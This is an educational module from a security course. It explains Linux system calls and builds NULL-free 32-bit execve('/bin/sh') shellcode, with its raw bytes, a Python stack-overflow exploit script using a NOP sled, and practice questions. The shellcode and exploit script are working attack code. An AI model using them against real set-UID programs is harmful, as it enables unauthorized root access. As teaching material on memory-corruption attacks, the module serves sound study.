Shellcode

The previous module showed how overwriting a return address redirects execution to existing code — a target() function already in the binary. But real binaries rarely contain a ready-made execve("/bin/sh", …) call. When there is no convenient target to hijack, an attacker injects their own machine code into the process and points the return address at it. That injected payload is called shellcode, because its classic goal is spawning an interactive shell.

Writing shellcode forces you to understand the lowest-level details of how programs communicate with the operating system: the system-call interface.

The Linux system-call interface

User programs cannot directly access hardware resources — they must ask the kernel via system calls. On Linux, the CPU transitions from user mode to kernel mode, executes the requested service, and returns. In assembly you trigger this transition with a single instruction; which instruction depends on the ABI:

ABI Trigger instruction Syscall # register Arg registers (in order)
x86 32-bit (int $0x80) int $0x80 %eax %ebx, %ecx, %edx, %esi, %edi, %ebp
x86-64 (syscall) syscall %rax %rdi, %rsi, %rdx, %r10, %r8, %r9

The simplest example: getpid is syscall number 20 (0x14) on 32-bit Linux. To call it:

mov $0x14, %eax   ; syscall number for getpid
int $0x80         ; enter the kernel

Every syscall has a fixed number you can look up (e.g., at syscalls32.paolostivanin.com). The kernel ignores register contents it does not need for a given call.

The target syscall: execve

The goal of most shellcode is to call execve, which replaces the current process image with a new program:

int execve(const char *filename, char *const argv[], char *const envp[]);

Called as execve("/bin/sh", {"/bin/sh", NULL}, NULL) it spawns a shell — and if the victim process was Set-UID root, that shell inherits root privileges.

On 32-bit Linux, sys_execve is syscall 0x0b (11). The register mapping is:

Register Value
%eax 0x0b (syscall number)
%ebx pointer to the filename string ("/bin/sh")
%ecx pointer to the argv array ({ptr_to_binsh, NULL})
%edx pointer to the envp array (NULL — no environment)

Building execve shellcode step by step

The challenge is that shellcode is position-independent: it has no idea where in memory it will land, so it cannot use hardcoded addresses. The classic solution is to build the "/bin/sh" string and the argv array on the stack at runtime, then read the addresses back from %esp.

Step 1 — Push "/bin/sh" onto the stack

x86 push works on 4-byte dwords. The string "/bin/sh" is 7 bytes; pad it to 8 by writing "//bin/sh" (the double slash is harmless to the kernel). Push a null terminator first, then the string in reverse order:

xor  %eax, %eax          ; zero eax (no NULL bytes in the instruction)
mov  %eax, %edx          ; edx = 0  (envp = NULL)
push %eax                ; push null terminator for the string
push $0x68732f6e         ; "n/sh" (little-endian: 6e 2f 73 68)
push $0x69622f2f         ; "//bi" (little-endian: 2f 2f 62 69)
mov  %esp, %ebx          ; ebx --> "//bin/sh\0" on the stack

After these pushes %esp points at the start of "//bin/sh", so mov %esp, %ebx gives us the filename pointer.

Step 2 — Build the argv array and set %ecx

execve needs argv = {ptr_to_binsh, NULL}. Push NULL (already in %eax) then push %ebx, then capture %esp:

push %eax                ; argv[1] = NULL
push %ebx                ; argv[0] = pointer to "//bin/sh"
mov  %esp, %ecx          ; ecx --> { ptr_to_binsh, NULL }

Step 3 — Set %eax and invoke

movb $0x0b, %al          ; eax = 0x0b (low byte only — avoids NULL bytes)
int  $0x80               ; syscall: execve("//bin/sh", argv, NULL)

Complete NULL-free shellcode

xor  %eax, %eax          ; eax = 0
mov  %eax, %edx          ; edx = 0  (envp)
push %eax                ; null terminator
push $0x68732f6e         ; "n/sh"
push $0x69622f2f         ; "//bi"
mov  %esp, %ebx          ; ebx --> filename
push %eax                ; argv[1] = NULL
push %ebx                ; argv[0] = ptr to filename
mov  %esp, %ecx          ; ecx --> argv
movb $0x0b, %al          ; eax = 11
int  $0x80

The NULL-byte problem — and how to fix it

String-copying functions like strcpy and gets stop at the first \x00 byte. A single NULL byte anywhere in the shellcode silently truncates the payload — the rest of the code never reaches the buffer.

The naive version of this shellcode contains several NULL bytes:

b8 0b 00 00 00   mov  $0xb, %eax      ← three NULLs
b9 00 00 00 00   mov  $0x0, %ecx      ← four NULLs
ba 00 00 00 00   mov  $0x0, %edx      ← four NULLs
6a 00            push $0x0            ← one NULL

The fixes applied above:

Naive (contains NULLs) NULL-free replacement Why it works
mov $0x0, %eax xor %eax, %eax XOR of a register with itself is always 0; opcode 31 c0 has no zero bytes
push $0x0 push %eax (after zeroing) pushes the already-zeroed register
mov $0x0b, %eax (opcode b8 0b 00 00 00) movb $0x0b, %al (opcode b0 0b) writes only the low byte; upper bytes were already zeroed by xor
mov $0x0, %edx mov %eax, %edx (after zeroing %eax) copies zero without embedding a zero byte

Assembling and extracting the bytes

Write the shellcode as an assembly file (shellcode.S), assemble it, then extract the raw bytes with objcopy or objdump:

gcc -m32 -nostdlib -static -o shellcode shellcode.S
objdump -d shellcode | grep -Po '\\t\K[0-9a-f ]+(?=\t)'

The slides show the assembled bytes for the complete shellcode:

\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89
\xe1\xb0\x0b\xcd\x80

No byte in this sequence is \x00.

Delivering the shellcode: the exploit script

With the raw bytes in hand, the exploit script (Python 3) assembles the full payload:

#!/usr/bin/env python3
import sys

shellcode = (
    b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
    b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
    b"\xe1\xb0\x0b\xcd\x80"
)

content = bytearray(0x90 for _ in range(100))  # NOP sled
start = 16
content[start:start + len(shellcode)] = shellcode

ret    = 0xffffcfd0  # estimated address inside the NOP sled
offset = 76          # bytes from buffer start to saved return address
L = 4                # 4 bytes for 32-bit address
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')

sys.stdout.buffer.write(content)

Key points: the buffer is prefilled with \x90 (NOP, opcode 0x90) rather than 'A', the shellcode is placed at an arbitrary offset inside the sled, and the return address is written at the offset discovered by cyclic/GDB. Because x86 is little-endian, ret.to_bytes(L, byteorder='little') writes the address bytes in the correct order.

Guessing the address: the NOP sled

Even after finding the buffer-to-return-address offset, you still need to guess where in memory the buffer lives — that is, what value to write as the new return address. Stack addresses vary between runs due to environment differences and ASLR.

The NOP sled (\x90\x90…) solves this: if the guessed address lands anywhere in the sled, execution slides harmlessly down the NOPs into the shellcode. A 100-byte NOP sled widens the valid target window by 100 addresses, making imprecise guesses succeed.

Defenses that break this attack

Two mitigations directly target shellcode injection:

Key takeaways

Practice

  1. On 32-bit Linux, which instruction triggers a system call and which register holds the system-call number?
  2. What is the 32-bit Linux syscall number for execve, and which register receives it before int $0x80?
  3. Why does standard execve shellcode push "//bin/sh" (double slash) rather than "/bin/sh"?
  4. Which instruction pair correctly zeroes %eax without introducing any \x00 bytes into the shellcode?
  5. In the NULL-free shellcode, mov $0x0b, %eax is replaced with movb $0x0b, %al. Why does the byte-sized move avoid NULL bytes?
  6. In the NOP-sled technique, what role does the \x90 byte play, and why does it help when the exact shellcode address is unknown?
  7. ASLR (Address Space Layout Randomization) with kernel.randomize_va_space=2 undermines shellcode injection primarily by:
  8. Trace through the complete NULL-free execve shellcode step by step. For each group of instructions, state what register value is set and why it is needed for the int $0x80 syscall.
  9. A student writes the following exploit payload: 100 bytes of 'A', followed by the shellcode bytes, followed by the guessed return address. Explain two reasons this payload is likely to fail, and describe the corrected structure.